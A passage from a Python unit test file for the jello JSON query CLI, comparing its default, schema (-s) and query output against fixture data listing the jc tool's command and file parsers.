      "argument": "--timedatectl",
      "version": "1.0",
      "description": "timedatectl status command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "timedatectl",
        "timedatectl status"
      ]
    },
    {
      "name": "uname",
      "argument": "--uname",
      "version": "1.1",
      "description": "uname -a command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin"
      ],
      "magic_commands": [
        "uname"
      ]
    },
    {
      "name": "uptime",
      "argument": "--uptime",
      "version": "1.0",
      "description": "uptime command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "uptime"
      ]
    },
    {
      "name": "w",
      "argument": "--w",
      "version": "1.0",
      "description": "w command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "w"
      ]
    },
    {
      "name": "who",
      "argument": "--who",
      "version": "1.0",
      "description": "who command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "who"
      ]
    },
    {
      "name": "xml",
      "argument": "--xml",
      "version": "1.0",
      "description": "XML file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Using the xmltodict library at https://github.com/martinblech/xmltodict",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "yaml",
      "argument": "--yaml",
      "version": "1.0",
      "description": "YAML file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ]
    }
  ]
}
'''
    # Capture stdout and run jello with a bare argv (no query argument),
    # which applies the identity transform to the fixture loaded in setUp.
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        testargs = ['jello']
        with patch.object(sys, 'argv', testargs):
            _ = jello.cli.main(data=self.jc_a_output)
    self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s(self):
    """
    Test jc -a | jello -s
    """
    # Expected stdout for the -s (schema) option: one flat dotted-path
    # assignment per leaf value, terminated with semicolons.
    self.expected = '''\
.name = "jc";
.version = "1.9.3";
.description = "jc cli output JSON conversion tool";
.author = "Kelly Brazil";
.author_email = "kellyjonbrazil@gmail.com";
.parser_count = 50;
.parsers[0].name = "airport";
.parsers[0].argument = "--airport";
.parsers[0].version = "1.0";
.parsers[0].description = "airport -I command parser";
.parsers[0].author = "Kelly Brazil";
.parsers[0].author_email = "kellyjonbrazil@gmail.com";
.parsers[0].compatible[0] = "darwin";
.parsers[0].magic_commands[0] = "airport -I";
.parsers[1].name = "airport_s";
.parsers[1].argument = "--airport-s";
.parsers[1].version = "1.0";
.parsers[1].description = "airport -s command parser";
.parsers[1].author = "Kelly Brazil";
.parsers[1].author_email = "kellyjonbrazil@gmail.com";
.parsers[1].compatible[0] = "darwin";
.parsers[1].magic_commands[0] = "airport -s";
.parsers[2].name = "arp";
.parsers[2].argument = "--arp";
.parsers[2].version = "1.2";
.parsers[2].description = "arp command parser";
.parsers[2].author = "Kelly Brazil";
.parsers[2].author_email = "kellyjonbrazil@gmail.com";
.parsers[2].compatible[0] = "linux";
.parsers[2].compatible[1] = "aix";
.parsers[2].compatible[2] = "freebsd";
.parsers[2].compatible[3] = "darwin";
.parsers[2].magic_commands[0] = "arp";
.parsers[3].name = "blkid";
.parsers[3].argument = "--blkid";
.parsers[3].version = "1.0";
.parsers[3].description = "blkid command parser";
.parsers[3].author = "Kelly Brazil";
.parsers[3].author_email = "kellyjonbrazil@gmail.com";
.parsers[3].compatible[0] = "linux";
.parsers[3].magic_commands[0] = "blkid";
.parsers[4].name = "crontab";
.parsers[4].argument = "--crontab";
.parsers[4].version = "1.1";
.parsers[4].description = "crontab command and file parser";
.parsers[4].author = "Kelly Brazil";
.parsers[4].author_email = "kellyjonbrazil@gmail.com";
.parsers[4].compatible[0] = "linux";
.parsers[4].compatible[1] = "darwin";
.parsers[4].compatible[2] = "aix";
.parsers[4].compatible[3] = "freebsd";
.parsers[4].magic_commands[0] = "crontab";
.parsers[5].name = "crontab_u";
.parsers[5].argument = "--crontab-u";
.parsers[5].version = "1.0";
.parsers[5].description = "crontab file parser with user support";
.parsers[5].author = "Kelly Brazil";
.parsers[5].author_email = "kellyjonbrazil@gmail.com";
.parsers[5].compatible[0] = "linux";
.parsers[5].compatible[1] = "darwin";
.parsers[5].compatible[2] = "aix";
.parsers[5].compatible[3] = "freebsd";
.parsers[6].name = "csv";
.parsers[6].argument = "--csv";
.parsers[6].version = "1.0";
.parsers[6].description = "CSV file parser";
.parsers[6].author = "Kelly Brazil";
.parsers[6].author_email = "kellyjonbrazil@gmail.com";
.parsers[6].details = "Using the python standard csv library";
.parsers[6].compatible[0] = "linux";
.parsers[6].compatible[1] = "darwin";
.parsers[6].compatible[2] = "cygwin";
.parsers[6].compatible[3] = "win32";
.parsers[6].compatible[4] = "aix";
.parsers[6].compatible[5] = "freebsd";
.parsers[7].name = "df";
.parsers[7].argument = "--df";
.parsers[7].version = "1.1";
.parsers[7].description = "df command parser";
.parsers[7].author = "Kelly Brazil";
.parsers[7].author_email = "kellyjonbrazil@gmail.com";
.parsers[7].compatible[0] = "linux";
.parsers[7].compatible[1] = "darwin";
.parsers[7].magic_commands[0] = "df";
.parsers[8].name = "dig";
.parsers[8].argument = "--dig";
.parsers[8].version = "1.1";
.parsers[8].description = "dig command parser";
.parsers[8].author = "Kelly Brazil";
.parsers[8].author_email = "kellyjonbrazil@gmail.com";
.parsers[8].compatible[0] = "linux";
.parsers[8].compatible[1] = "aix";
.parsers[8].compatible[2] = "freebsd";
.parsers[8].compatible[3] = "darwin";
.parsers[8].magic_commands[0] = "dig";
.parsers[9].name = "du";
.parsers[9].argument = "--du";
.parsers[9].version = "1.1";
.parsers[9].description = "du command parser";
.parsers[9].author = "Kelly Brazil";
.parsers[9].author_email = "kellyjonbrazil@gmail.com";
.parsers[9].compatible[0] = "linux";
.parsers[9].compatible[1] = "darwin";
.parsers[9].compatible[2] = "aix";
.parsers[9].compatible[3] = "freebsd";
.parsers[9].magic_commands[0] = "du";
.parsers[10].name = "env";
.parsers[10].argument = "--env";
.parsers[10].version = "1.1";
.parsers[10].description = "env command parser";
.parsers[10].author = "Kelly Brazil";
.parsers[10].author_email = "kellyjonbrazil@gmail.com";
.parsers[10].compatible[0] = "linux";
.parsers[10].compatible[1] = "darwin";
.parsers[10].compatible[2] = "cygwin";
.parsers[10].compatible[3] = "win32";
.parsers[10].compatible[4] = "aix";
.parsers[10].compatible[5] = "freebsd";
.parsers[10].magic_commands[0] = "env";
.parsers[11].name = "file";
.parsers[11].argument = "--file";
.parsers[11].version = "1.1";
.parsers[11].description = "file command parser";
.parsers[11].author = "Kelly Brazil";
.parsers[11].author_email = "kellyjonbrazil@gmail.com";
.parsers[11].compatible[0] = "linux";
.parsers[11].compatible[1] = "aix";
.parsers[11].compatible[2] = "freebsd";
.parsers[11].compatible[3] = "darwin";
.parsers[11].magic_commands[0] = "file";
.parsers[12].name = "free";
.parsers[12].argument = "--free";
.parsers[12].version = "1.0";
.parsers[12].description = "free command parser";
.parsers[12].author = "Kelly Brazil";
.parsers[12].author_email = "kellyjonbrazil@gmail.com";
.parsers[12].compatible[0] = "linux";
.parsers[12].magic_commands[0] = "free";
.parsers[13].name = "fstab";
.parsers[13].argument = "--fstab";
.parsers[13].version = "1.0";
.parsers[13].description = "fstab file parser";
.parsers[13].author = "Kelly Brazil";
.parsers[13].author_email = "kellyjonbrazil@gmail.com";
.parsers[13].compatible[0] = "linux";
.parsers[14].name = "group";
.parsers[14].argument = "--group";
.parsers[14].version = "1.0";
.parsers[14].description = "/etc/group file parser";
.parsers[14].author = "Kelly Brazil";
.parsers[14].author_email = "kellyjonbrazil@gmail.com";
.parsers[14].compatible[0] = "linux";
.parsers[14].compatible[1] = "darwin";
.parsers[14].compatible[2] = "aix";
.parsers[14].compatible[3] = "freebsd";
.parsers[15].name = "gshadow";
.parsers[15].argument = "--gshadow";
.parsers[15].version = "1.0";
.parsers[15].description = "/etc/gshadow file parser";
.parsers[15].author = "Kelly Brazil";
.parsers[15].author_email = "kellyjonbrazil@gmail.com";
.parsers[15].compatible[0] = "linux";
.parsers[15].compatible[1] = "aix";
.parsers[15].compatible[2] = "freebsd";
.parsers[16].name = "history";
.parsers[16].argument = "--history";
.parsers[16].version = "1.2";
.parsers[16].description = "history command parser";
.parsers[16].author = "Kelly Brazil";
.parsers[16].author_email = "kellyjonbrazil@gmail.com";
.parsers[16].details = "Optimizations by https://github.com/philippeitis";
.parsers[16].compatible[0] = "linux";
.parsers[16].compatible[1] = "darwin";
.parsers[16].compatible[2] = "cygwin";
.parsers[16].compatible[3] = "aix";
.parsers[16].compatible[4] = "freebsd";
.parsers[17].name = "hosts";
.parsers[17].argument = "--hosts";
.parsers[17].version = "1.0";
.parsers[17].description = "/etc/hosts file parser";
.parsers[17].author = "Kelly Brazil";
.parsers[17].author_email = "kellyjonbrazil@gmail.com";
.parsers[17].compatible[0] = "linux";
.parsers[17].compatible[1] = "darwin";
.parsers[17].compatible[2] = "cygwin";
.parsers[17].compatible[3] = "win32";
.parsers[17].compatible[4] = "aix";
.parsers[17].compatible[5] = "freebsd";
.parsers[18].name = "id";
.parsers[18].argument = "--id";
.parsers[18].version = "1.0";
.parsers[18].description = "id command parser";
.parsers[18].author = "Kelly Brazil";
.parsers[18].author_email = "kellyjonbrazil@gmail.com";
.parsers[18].compatible[0] = "linux";
.parsers[18].compatible[1] = "darwin";
.parsers[18].compatible[2] = "aix";
.parsers[18].compatible[3] = "freebsd";
.parsers[18].magic_commands[0] = "id";
.parsers[19].name = "ifconfig";
.parsers[19].argument = "--ifconfig";
.parsers[19].version = "1.5";
.parsers[19].description = "ifconfig command parser";
.parsers[19].author = "Kelly Brazil";
.parsers[19].author_email = "kellyjonbrazil@gmail.com";
.parsers[19].details = "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser";
.parsers[19].compatible[0] = "linux";
.parsers[19].compatible[1] = "aix";
.parsers[19].compatible[2] = "freebsd";
.parsers[19].compatible[3] = "darwin";
.parsers[19].magic_commands[0] = "ifconfig";
.parsers[20].name = "ini";
.parsers[20].argument = "--ini";
.parsers[20].version = "1.0";
.parsers[20].description = "INI file parser";
.parsers[20].author = "Kelly Brazil";
.parsers[20].author_email = "kellyjonbrazil@gmail.com";
.parsers[20].details = "Using configparser from the standard library";
.parsers[20].compatible[0] = "linux";
.parsers[20].compatible[1] = "darwin";
.parsers[20].compatible[2] = "cygwin";
.parsers[20].compatible[3] = "win32";
.parsers[20].compatible[4] = "aix";
.parsers[20].compatible[5] = "freebsd";
.parsers[21].name = "iptables";
.parsers[21].argument = "--iptables";
.parsers[21].version = "1.1";
.parsers[21].description = "iptables command parser";
.parsers[21].author = "Kelly Brazil";
.parsers[21].author_email = "kellyjonbrazil@gmail.com";
.parsers[21].compatible[0] = "linux";
.parsers[21].magic_commands[0] = "iptables";
.parsers[22].name = "jobs";
.parsers[22].argument = "--jobs";
.parsers[22].version = "1.0";
.parsers[22].description = "jobs command parser";
.parsers[22].author = "Kelly Brazil";
.parsers[22].author_email = "kellyjonbrazil@gmail.com";
.parsers[22].compatible[0] = "linux";
.parsers[22].compatible[1] = "darwin";
.parsers[22].compatible[2] = "cygwin";
.parsers[22].compatible[3] = "aix";
.parsers[22].compatible[4] = "freebsd";
.parsers[22].magic_commands[0] = "jobs";
.parsers[23].name = "last";
.parsers[23].argument = "--last";
.parsers[23].version = "1.0";
.parsers[23].description = "last and lastb command parser";
.parsers[23].author = "Kelly Brazil";
.parsers[23].author_email = "kellyjonbrazil@gmail.com";
.parsers[23].compatible[0] = "linux";
.parsers[23].compatible[1] = "darwin";
.parsers[23].compatible[2] = "aix";
.parsers[23].compatible[3] = "freebsd";
.parsers[23].magic_commands[0] = "last";
.parsers[23].magic_commands[1] = "lastb";
.parsers[24].name = "ls";
.parsers[24].argument = "--ls";
.parsers[24].version = "1.3";
.parsers[24].description = "ls command parser";
.parsers[24].author = "Kelly Brazil";
.parsers[24].author_email = "kellyjonbrazil@gmail.com";
.parsers[24].compatible[0] = "linux";
.parsers[24].compatible[1] = "darwin";
.parsers[24].compatible[2] = "cygwin";
.parsers[24].compatible[3] = "aix";
.parsers[24].compatible[4] = "freebsd";
.parsers[24].magic_commands[0] = "ls";
.parsers[25].name = "lsblk";
.parsers[25].argument = "--lsblk";
.parsers[25].version = "1.3";
.parsers[25].description = "lsblk command parser";
.parsers[25].author = "Kelly Brazil";
.parsers[25].author_email = "kellyjonbrazil@gmail.com";
.parsers[25].compatible[0] = "linux";
.parsers[25].magic_commands[0] = "lsblk";
.parsers[26].name = "lsmod";
.parsers[26].argument = "--lsmod";
.parsers[26].version = "1.1";
.parsers[26].description = "lsmod command parser";
.parsers[26].author = "Kelly Brazil";
.parsers[26].author_email = "kellyjonbrazil@gmail.com";
.parsers[26].compatible[0] = "linux";
.parsers[26].magic_commands[0] = "lsmod";
.parsers[27].name = "lsof";
.parsers[27].argument = "--lsof";
.parsers[27].version = "1.0";
.parsers[27].description = "lsof command parser";
.parsers[27].author = "Kelly Brazil";
.parsers[27].author_email = "kellyjonbrazil@gmail.com";
.parsers[27].compatible[0] = "linux";
.parsers[27].magic_commands[0] = "lsof";
.parsers[28].name = "mount";
.parsers[28].argument = "--mount";
.parsers[28].version = "1.1";
.parsers[28].description = "mount command parser";
.parsers[28].author = "Kelly Brazil";
.parsers[28].author_email = "kellyjonbrazil@gmail.com";
.parsers[28].compatible[0] = "linux";
.parsers[28].compatible[1] = "darwin";
.parsers[28].magic_commands[0] = "mount";
.parsers[29].name = "netstat";
.parsers[29].argument = "--netstat";
.parsers[29].version = "1.2";
.parsers[29].description = "netstat command parser";
.parsers[29].author = "Kelly Brazil";
.parsers[29].author_email = "kellyjonbrazil@gmail.com";
.parsers[29].compatible[0] = "linux";
.parsers[29].magic_commands[0] = "netstat";
.parsers[30].name = "ntpq";
.parsers[30].argument = "--ntpq";
.parsers[30].version = "1.0";
.parsers[30].description = "ntpq -p command parser";
.parsers[30].author = "Kelly Brazil";
.parsers[30].author_email = "kellyjonbrazil@gmail.com";
.parsers[30].compatible[0] = "linux";
.parsers[30].magic_commands[0] = "ntpq";
.parsers[31].name = "passwd";
.parsers[31].argument = "--passwd";
.parsers[31].version = "1.0";
.parsers[31].description = "/etc/passwd file parser";
.parsers[31].author = "Kelly Brazil";
.parsers[31].author_email = "kellyjonbrazil@gmail.com";
.parsers[31].compatible[0] = "linux";
.parsers[31].compatible[1] = "darwin";
.parsers[31].compatible[2] = "aix";
.parsers[31].compatible[3] = "freebsd";
.parsers[32].name = "pip_list";
.parsers[32].argument = "--pip-list";
.parsers[32].version = "1.0";
.parsers[32].description = "pip list command parser";
.parsers[32].author = "Kelly Brazil";
.parsers[32].author_email = "kellyjonbrazil@gmail.com";
.parsers[32].compatible[0] = "linux";
.parsers[32].compatible[1] = "darwin";
.parsers[32].compatible[2] = "cygwin";
.parsers[32].compatible[3] = "win32";
.parsers[32].compatible[4] = "aix";
.parsers[32].compatible[5] = "freebsd";
.parsers[32].magic_commands[0] = "pip list";
.parsers[32].magic_commands[1] = "pip3 list";
.parsers[33].name = "pip_show";
.parsers[33].argument = "--pip-show";
.parsers[33].version = "1.0";
.parsers[33].description = "pip show command parser";
.parsers[33].author = "Kelly Brazil";
.parsers[33].author_email = "kellyjonbrazil@gmail.com";
.parsers[33].compatible[0] = "linux";
.parsers[33].compatible[1] = "darwin";
.parsers[33].compatible[2] = "cygwin";
.parsers[33].compatible[3] = "win32";
.parsers[33].compatible[4] = "aix";
.parsers[33].compatible[5] = "freebsd";
.parsers[33].magic_commands[0] = "pip show";
.parsers[33].magic_commands[1] = "pip3 show";
.parsers[34].name = "ps";
.parsers[34].argument = "--ps";
.parsers[34].version = "1.1";
.parsers[34].description = "ps command parser";
.parsers[34].author = "Kelly Brazil";
.parsers[34].author_email = "kellyjonbrazil@gmail.com";
.parsers[34].compatible[0] = "linux";
.parsers[34].compatible[1] = "darwin";
.parsers[34].compatible[2] = "cygwin";
.parsers[34].compatible[3] = "aix";
.parsers[34].compatible[4] = "freebsd";
.parsers[34].magic_commands[0] = "ps";
.parsers[35].name = "route";
.parsers[35].argument = "--route";
.parsers[35].version = "1.0";
.parsers[35].description = "route command parser";
.parsers[35].author = "Kelly Brazil";
.parsers[35].author_email = "kellyjonbrazil@gmail.com";
.parsers[35].compatible[0] = "linux";
.parsers[35].magic_commands[0] = "route";
.parsers[36].name = "shadow";
.parsers[36].argument = "--shadow";
.parsers[36].version = "1.0";
.parsers[36].description = "/etc/shadow file parser";
.parsers[36].author = "Kelly Brazil";
.parsers[36].author_email = "kellyjonbrazil@gmail.com";
.parsers[36].compatible[0] = "linux";
.parsers[36].compatible[1] = "darwin";
.parsers[36].compatible[2] = "aix";
.parsers[36].compatible[3] = "freebsd";
.parsers[37].name = "ss";
.parsers[37].argument = "--ss";
.parsers[37].version = "1.0";
.parsers[37].description = "ss command parser";
.parsers[37].author = "Kelly Brazil";
.parsers[37].author_email = "kellyjonbrazil@gmail.com";
.parsers[37].compatible[0] = "linux";
.parsers[37].magic_commands[0] = "ss";
.parsers[38].name = "stat";
.parsers[38].argument = "--stat";
.parsers[38].version = "1.0";
.parsers[38].description = "stat command parser";
.parsers[38].author = "Kelly Brazil";
.parsers[38].author_email = "kellyjonbrazil@gmail.com";
.parsers[38].compatible[0] = "linux";
.parsers[38].magic_commands[0] = "stat";
.parsers[39].name = "systemctl";
.parsers[39].argument = "--systemctl";
.parsers[39].version = "1.0";
.parsers[39].description = "systemctl command parser";
.parsers[39].author = "Kelly Brazil";
.parsers[39].author_email = "kellyjonbrazil@gmail.com";
.parsers[39].compatible[0] = "linux";
.parsers[39].magic_commands[0] = "systemctl";
.parsers[40].name = "systemctl_lj";
.parsers[40].argument = "--systemctl-lj";
.parsers[40].version = "1.0";
.parsers[40].description = "systemctl list-jobs command parser";
.parsers[40].author = "Kelly Brazil";
.parsers[40].author_email = "kellyjonbrazil@gmail.com";
.parsers[40].compatible[0] = "linux";
.parsers[40].magic_commands[0] = "systemctl list-jobs";
.parsers[41].name = "systemctl_ls";
.parsers[41].argument = "--systemctl-ls";
.parsers[41].version = "1.0";
.parsers[41].description = "systemctl list-sockets command parser";
.parsers[41].author = "Kelly Brazil";
.parsers[41].author_email = "kellyjonbrazil@gmail.com";
.parsers[41].compatible[0] = "linux";
.parsers[41].magic_commands[0] = "systemctl list-sockets";
.parsers[42].name = "systemctl_luf";
.parsers[42].argument = "--systemctl-luf";
.parsers[42].version = "1.0";
.parsers[42].description = "systemctl list-unit-files command parser";
.parsers[42].author = "Kelly Brazil";
.parsers[42].author_email = "kellyjonbrazil@gmail.com";
.parsers[42].compatible[0] = "linux";
.parsers[42].magic_commands[0] = "systemctl list-unit-files";
.parsers[43].name = "timedatectl";
.parsers[43].argument = "--timedatectl";
.parsers[43].version = "1.0";
.parsers[43].description = "timedatectl status command parser";
.parsers[43].author = "Kelly Brazil";
.parsers[43].author_email = "kellyjonbrazil@gmail.com";
.parsers[43].compatible[0] = "linux";
.parsers[43].magic_commands[0] = "timedatectl";
.parsers[43].magic_commands[1] = "timedatectl status";
.parsers[44].name = "uname";
.parsers[44].argument = "--uname";
.parsers[44].version = "1.1";
.parsers[44].description = "uname -a command parser";
.parsers[44].author = "Kelly Brazil";
.parsers[44].author_email = "kellyjonbrazil@gmail.com";
.parsers[44].compatible[0] = "linux";
.parsers[44].compatible[1] = "darwin";
.parsers[44].magic_commands[0] = "uname";
.parsers[45].name = "uptime";
.parsers[45].argument = "--uptime";
.parsers[45].version = "1.0";
.parsers[45].description = "uptime command parser";
.parsers[45].author = "Kelly Brazil";
.parsers[45].author_email = "kellyjonbrazil@gmail.com";
.parsers[45].compatible[0] = "linux";
.parsers[45].compatible[1] = "darwin";
.parsers[45].compatible[2] = "cygwin";
.parsers[45].compatible[3] = "aix";
.parsers[45].compatible[4] = "freebsd";
.parsers[45].magic_commands[0] = "uptime";
.parsers[46].name = "w";
.parsers[46].argument = "--w";
.parsers[46].version = "1.0";
.parsers[46].description = "w command parser";
.parsers[46].author = "Kelly Brazil";
.parsers[46].author_email = "kellyjonbrazil@gmail.com";
.parsers[46].compatible[0] = "linux";
.parsers[46].compatible[1] = "darwin";
.parsers[46].compatible[2] = "cygwin";
.parsers[46].compatible[3] = "aix";
.parsers[46].compatible[4] = "freebsd";
.parsers[46].magic_commands[0] = "w";
.parsers[47].name = "who";
.parsers[47].argument = "--who";
.parsers[47].version = "1.0";
.parsers[47].description = "who command parser";
.parsers[47].author = "Kelly Brazil";
.parsers[47].author_email = "kellyjonbrazil@gmail.com";
.parsers[47].compatible[0] = "linux";
.parsers[47].compatible[1] = "darwin";
.parsers[47].compatible[2] = "cygwin";
.parsers[47].compatible[3] = "aix";
.parsers[47].compatible[4] = "freebsd";
.parsers[47].magic_commands[0] = "who";
.parsers[48].name = "xml";
.parsers[48].argument = "--xml";
.parsers[48].version = "1.0";
.parsers[48].description = "XML file parser";
.parsers[48].author = "Kelly Brazil";
.parsers[48].author_email = "kellyjonbrazil@gmail.com";
.parsers[48].details = "Using the xmltodict library at https://github.com/martinblech/xmltodict";
.parsers[48].compatible[0] = "linux";
.parsers[48].compatible[1] = "darwin";
.parsers[48].compatible[2] = "cygwin";
.parsers[48].compatible[3] = "win32";
.parsers[48].compatible[4] = "aix";
.parsers[48].compatible[5] = "freebsd";
.parsers[49].name = "yaml";
.parsers[49].argument = "--yaml";
.parsers[49].version = "1.0";
.parsers[49].description = "YAML file parser";
.parsers[49].author = "Kelly Brazil";
.parsers[49].author_email = "kellyjonbrazil@gmail.com";
.parsers[49].details = "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml";
.parsers[49].compatible[0] = "linux";
.parsers[49].compatible[1] = "darwin";
.parsers[49].compatible[2] = "cygwin";
.parsers[49].compatible[3] = "win32";
.parsers[49].compatible[4] = "aix";
.parsers[49].compatible[5] = "freebsd";
'''
    # Capture stdout and run jello with the -s flag, which emits the
    # flat schema representation of the same fixture data.
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        testargs = ['jello', '-s']
        with patch.object(sys, 'argv', testargs):
            _ = jello.cli.main(data=self.jc_a_output)
    self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers(self):
    """
    Test jc -a | jello '_["parsers"]'

    Runs the jello CLI with the query '_["parsers"]' against the stored
    sample `jc -a` output and checks the pretty-printed JSON it writes
    to stdout.
    """
    # Expected stdout: the full "parsers" array pretty-printed by jello.
    # The comparison below is an exact string match (including the
    # trailing newline), so this literal must match jello's output
    # byte-for-byte.
    self.expected = '''\
[
{
"name": "airport",
"argument": "--airport",
"version": "1.0",
"description": "airport -I command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -I"
]
},
{
"name": "airport_s",
"argument": "--airport-s",
"version": "1.0",
"description": "airport -s command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -s"
]
},
{
"name": "arp",
"argument": "--arp",
"version": "1.2",
"description": "arp command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"arp"
]
},
{
"name": "blkid",
"argument": "--blkid",
"version": "1.0",
"description": "blkid command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"blkid"
]
},
{
"name": "crontab",
"argument": "--crontab",
"version": "1.1",
"description": "crontab command and file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"crontab"
]
},
{
"name": "crontab_u",
"argument": "--crontab-u",
"version": "1.0",
"description": "crontab file parser with user support",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "csv",
"argument": "--csv",
"version": "1.0",
"description": "CSV file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the python standard csv library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "df",
"argument": "--df",
"version": "1.1",
"description": "df command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"df"
]
},
{
"name": "dig",
"argument": "--dig",
"version": "1.1",
"description": "dig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"dig"
]
},
{
"name": "du",
"argument": "--du",
"version": "1.1",
"description": "du command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"du"
]
},
{
"name": "env",
"argument": "--env",
"version": "1.1",
"description": "env command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"env"
]
},
{
"name": "file",
"argument": "--file",
"version": "1.1",
"description": "file command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"file"
]
},
{
"name": "free",
"argument": "--free",
"version": "1.0",
"description": "free command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"free"
]
},
{
"name": "fstab",
"argument": "--fstab",
"version": "1.0",
"description": "fstab file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
]
},
{
"name": "group",
"argument": "--group",
"version": "1.0",
"description": "/etc/group file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "gshadow",
"argument": "--gshadow",
"version": "1.0",
"description": "/etc/gshadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd"
]
},
{
"name": "history",
"argument": "--history",
"version": "1.2",
"description": "history command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Optimizations by https://github.com/philippeitis",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
]
},
{
"name": "hosts",
"argument": "--hosts",
"version": "1.0",
"description": "/etc/hosts file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
},
{
"name": "ifconfig",
"argument": "--ifconfig",
"version": "1.5",
"description": "ifconfig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"ifconfig"
]
},
{
"name": "ini",
"argument": "--ini",
"version": "1.0",
"description": "INI file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using configparser from the standard library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "iptables",
"argument": "--iptables",
"version": "1.1",
"description": "iptables command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"iptables"
]
},
{
"name": "jobs",
"argument": "--jobs",
"version": "1.0",
"description": "jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"jobs"
]
},
{
"name": "last",
"argument": "--last",
"version": "1.0",
"description": "last and lastb command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"last",
"lastb"
]
},
{
"name": "ls",
"argument": "--ls",
"version": "1.3",
"description": "ls command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ls"
]
},
{
"name": "lsblk",
"argument": "--lsblk",
"version": "1.3",
"description": "lsblk command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
